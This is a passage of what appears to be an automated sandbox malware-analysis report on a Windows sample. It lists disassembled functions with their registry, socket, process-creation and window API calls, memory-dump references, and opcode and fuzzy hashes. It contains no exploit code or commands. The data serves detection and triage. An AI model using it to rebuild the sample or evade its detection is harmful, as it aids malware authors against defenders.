                                                                                                                      • Part of subcall function 003A0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003A1090
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 003A1058
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 395352322-0
                                                                                                                    • Opcode ID: 5319aebb781b1ca0d9ad5b7d314ab57fcf7af2a35f89ef200ecf07b38aa7ee66
                                                                                                                    • Instruction ID: b3b7642f8854f147fa5916685a828a751b85e86a20d00472a68c7de57ca411be
                                                                                                                    • Opcode Fuzzy Hash: 5319aebb781b1ca0d9ad5b7d314ab57fcf7af2a35f89ef200ecf07b38aa7ee66
                                                                                                                    • Instruction Fuzzy Hash: 4931EDB1901109BFDB16DF90DC89EFFB7BCEF0A350F000169E511E2151EA749E899AA4
                                                                                                                    Function 003A62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003A62EC
                                                                                                                    • GetWindowLongW.USER32(011B58C8,000000F0), ref: 003A631F
                                                                                                                    • GetWindowLongW.USER32(011B58C8,000000F0), ref: 003A6354
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003A6386
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003A63B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003A63C1
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003A63DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2178440468-0
                                                                                                                    • Opcode ID: 68eab3b778820fd724170e52168e56065bf6387348616d71c44cc25ae431c437
                                                                                                                    • Instruction ID: 5572b0bdbecdfcad59e13b0bcd26378d41911ec39d3ae70cd4b952d2358857fe
                                                                                                                    • Opcode Fuzzy Hash: 68eab3b778820fd724170e52168e56065bf6387348616d71c44cc25ae431c437
                                                                                                                    • Instruction Fuzzy Hash: DE310238640290EFDB22CF58DC86F5937E9FB4A714F1A42A8F5518F2F2CB71A8419B50
                                                                                                                    Function 0037DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0037DB2E
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0037DB54
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0037DB57
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0037DB75
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0037DB7E
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0037DBA3
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0037DBB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: 933beddae142126d248edc7091d942987e5b35604cc969a25e897d99c490b967
                                                                                                                    • Instruction ID: cadfa88438bbd9e370d27f409e197a0ed47778fb460a8d0c710429563c17c11d
                                                                                                                    • Opcode Fuzzy Hash: 933beddae142126d248edc7091d942987e5b35604cc969a25e897d99c490b967
                                                                                                                    • Instruction Fuzzy Hash: 49219236600219AFDF21DFB9DC88CBB73BCEF0A360B018525FA18DB250D6749C418BA4
                                                                                                                    Function 00396173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00397D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00397DB6
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003961C6
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003961D5
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0039620E
                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00396217
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00396221
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 0039624A
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00396263
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 910771015-0
                                                                                                                    • Opcode ID: 92b5a062414f580281ea6784b7ddfbd75020e9882314cc9fa202a050a97b12f9
                                                                                                                    • Instruction ID: b764e8fd091e51fe937a871ac4017be1165d7c0969bb04f028d58f0ec93951a1
                                                                                                                    • Opcode Fuzzy Hash: 92b5a062414f580281ea6784b7ddfbd75020e9882314cc9fa202a050a97b12f9
                                                                                                                    • Instruction Fuzzy Hash: 2F31C431600218AFEF12AF64DC86FBE77ACEF45760F054429FD45AB291DB74AC048BA1
                                                                                                                    Function 0037F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                    • Opcode ID: de30e785c020ec8697c2ef9c4dead946680d49e89f4c4ecf3f79ba384ce28727
                                                                                                                    • Instruction ID: c1841fb25ac620593999686cf79cb5186bf88c82b43f71c03528db2b7233c350
                                                                                                                    • Opcode Fuzzy Hash: de30e785c020ec8697c2ef9c4dead946680d49e89f4c4ecf3f79ba384ce28727
                                                                                                                    • Instruction Fuzzy Hash: 112146722046516ED237AA34AC03FA773DCFF55384F11C039F98A8F491EBA8AD81D295
                                                                                                                    Function 0037DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0037DC09
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0037DC2F
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0037DC32
                                                                                                                    • SysAllocString.OLEAUT32 ref: 0037DC53
                                                                                                                    • SysFreeString.OLEAUT32 ref: 0037DC5C
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0037DC76
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0037DC84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: d053b57ef78aa5ff62b0ab81305674b35dd0fdec72db145ef9aa1bc9c6c9c3f5
                                                                                                                    • Instruction ID: fc38f0832496d3935e93fbc3c3ca9d7024cede490facb5ea0f3d5c60ac4fafbb
                                                                                                                    • Opcode Fuzzy Hash: d053b57ef78aa5ff62b0ab81305674b35dd0fdec72db145ef9aa1bc9c6c9c3f5
                                                                                                                    • Instruction Fuzzy Hash: 3C216035604205AF9B26ABF9DC88DAB77ECEF09360B11C125F918CB260DAB4EC41D764
                                                                                                                    Function 003A75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00321D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00321D73
                                                                                                                      • Part of subcall function 00321D35: GetStockObject.GDI32(00000011), ref: 00321D87
                                                                                                                      • Part of subcall function 00321D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00321D91
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003A7632
                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003A763F
                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003A764A
                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003A7659
                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003A7665
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                    • Opcode ID: a65d5192e16bac3d0f21458a73e4ec308bd9e8b61368325ba0c746865ddb9b9b
                                                                                                                    • Instruction ID: f9e7aa57d6580007337f5ceb33c1e778a83134fac732aa6813fddf84511538e5
                                                                                                                    • Opcode Fuzzy Hash: a65d5192e16bac3d0f21458a73e4ec308bd9e8b61368325ba0c746865ddb9b9b
                                                                                                                    • Instruction Fuzzy Hash: F011C4B2110219BFEF128F64CC85EE77F6DEF09798F014115FA04A60A0CB729C21DBA4
                                                                                                                    Function 00349AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __init_pointers.LIBCMT ref: 00349AE6
                                                                                                                      • Part of subcall function 00343187: EncodePointer.KERNEL32(00000000), ref: 0034318A
                                                                                                                      • Part of subcall function 00343187: __initp_misc_winsig.LIBCMT ref: 003431A5
                                                                                                                      • Part of subcall function 00343187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00349EA0
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00349EB4
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00349EC7
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00349EDA
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00349EED
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00349F00
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00349F13
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00349F26
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00349F39
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00349F4C
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00349F5F
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00349F72
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00349F85
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00349F98
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00349FAB
                                                                                                                      • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00349FBE
                                                                                                                    • __mtinitlocks.LIBCMT ref: 00349AEB
                                                                                                                    • __mtterm.LIBCMT ref: 00349AF4
                                                                                                                      • Part of subcall function 00349B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00349AF9,00347CD0,003DA0B8,00000014), ref: 00349C56
                                                                                                                      • Part of subcall function 00349B5C: _free.LIBCMT ref: 00349C5D
                                                                                                                      • Part of subcall function 00349B5C: DeleteCriticalSection.KERNEL32(02>,?,?,00349AF9,00347CD0,003DA0B8,00000014), ref: 00349C7F
                                                                                                                    • __calloc_crt.LIBCMT ref: 00349B19
                                                                                                                    • __initptd.LIBCMT ref: 00349B3B
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00349B42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3567560977-0
                                                                                                                    • Opcode ID: c3670eb77571a2f26761081405f2f9397b09d159820043ba71ddcde868ee9050
                                                                                                                    • Instruction ID: 62392d11fd8ef0e9c5cd3d1dc3d8524ebc9611471f8b7e377099564a5252f48b
                                                                                                                    • Opcode Fuzzy Hash: c3670eb77571a2f26761081405f2f9397b09d159820043ba71ddcde868ee9050
                                                                                                                    • Instruction Fuzzy Hash: 3BF06D3250A7215AE677B774BC03B8B2AD4DF03738F210A1BF4608E0D2EF20B44141A0
                                                                                                                    Function 003AB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003AB644
                                                                                                                    • _memset.LIBCMT ref: 003AB653
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003E6F20,003E6F64), ref: 003AB682
                                                                                                                    • CloseHandle.KERNEL32 ref: 003AB694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                                                    • String ID: o>$do>
                                                                                                                    • API String ID: 3277943733-4142427356
                                                                                                                    • Opcode ID: e1a52554fbd70b1c19d34ff6076b53d687c93e9e31273dfdfeed78125f9fd04c
                                                                                                                    • Instruction ID: 4cdc16e0d123e1b6acb348976e31aa357e574fe11755d0bfac9e68a98f60c475
                                                                                                                    • Opcode Fuzzy Hash: e1a52554fbd70b1c19d34ff6076b53d687c93e9e31273dfdfeed78125f9fd04c
                                                                                                                    • Instruction Fuzzy Hash: EFF05EB65403547FEB222761BC47FBB7A9CEB1A3D5F004120BA09ED1E2D7715C0187A8
                                                                                                                    Function 0034406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00343F85), ref: 00344085
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0034408C
                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 00344097
                                                                                                                    • DecodePointer.KERNEL32(00343F85), ref: 003440B2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                    • Opcode ID: 695e858b5e65aa4a8b4f64f38b45fa4e2d83a58cd293b0aaf5573197800f9472
                                                                                                                    • Instruction ID: eac9dd66d18828905e2fcc3f48e1c4a1e76eef45e5158d2d6a268de30d09c569
                                                                                                                    • Opcode Fuzzy Hash: 695e858b5e65aa4a8b4f64f38b45fa4e2d83a58cd293b0aaf5573197800f9472
                                                                                                                    • Instruction Fuzzy Hash: 2EE09A74542240AFDB63BFA2EC4DB467AACB715746F10462CF111EA0E0CB7656049A14
                                                                                                                    Function 003864B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3253778849-0
                                                                                                                    • Opcode ID: 07f7beecbd1dd8334db84aaf9af2abfb4d3119d97a414b28777fd7aaa104b083
                                                                                                                    • Instruction ID: 77a1e34bae198b2f0be9ec5327598ec64af8cc994056707b0af87301159614a5
                                                                                                                    • Opcode Fuzzy Hash: 07f7beecbd1dd8334db84aaf9af2abfb4d3119d97a414b28777fd7aaa104b083
                                                                                                                    • Instruction Fuzzy Hash: BC619C30A0065A9BCF17FF60CC82AFE37A9AF09308F044559F9595F292EB34A955CB50
                                                                                                                    Function 003A01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 003A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039FDAD,?,?), ref: 003A0E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A02BD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A02FD
                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003A0320
                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003A0349
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003A038C
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A0399
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4046560759-0
                                                                                                                    • Opcode ID: 0cf6a315f2ea26137d987a92a46d069d4c83b1c036e01901f641792fa7efee50
                                                                                                                    • Instruction ID: 3c2059a49e73ab1b5a69f6c9dc1e1cd71df0931f582ae783d116a9fa3911c4ba
                                                                                                                    • Opcode Fuzzy Hash: 0cf6a315f2ea26137d987a92a46d069d4c83b1c036e01901f641792fa7efee50
                                                                                                                    • Instruction Fuzzy Hash: D8514931208300AFCB16EF64D885E6EBBE9FF86314F04491DF5958B2A2DB31E945CB52
                                                                                                                    Function 003A5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenu.USER32(?), ref: 003A57FB
                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 003A5832
                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003A585A
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 003A58C9
                                                                                                                    • GetSubMenu.USER32(?,?), ref: 003A58D7
                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 003A5928
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
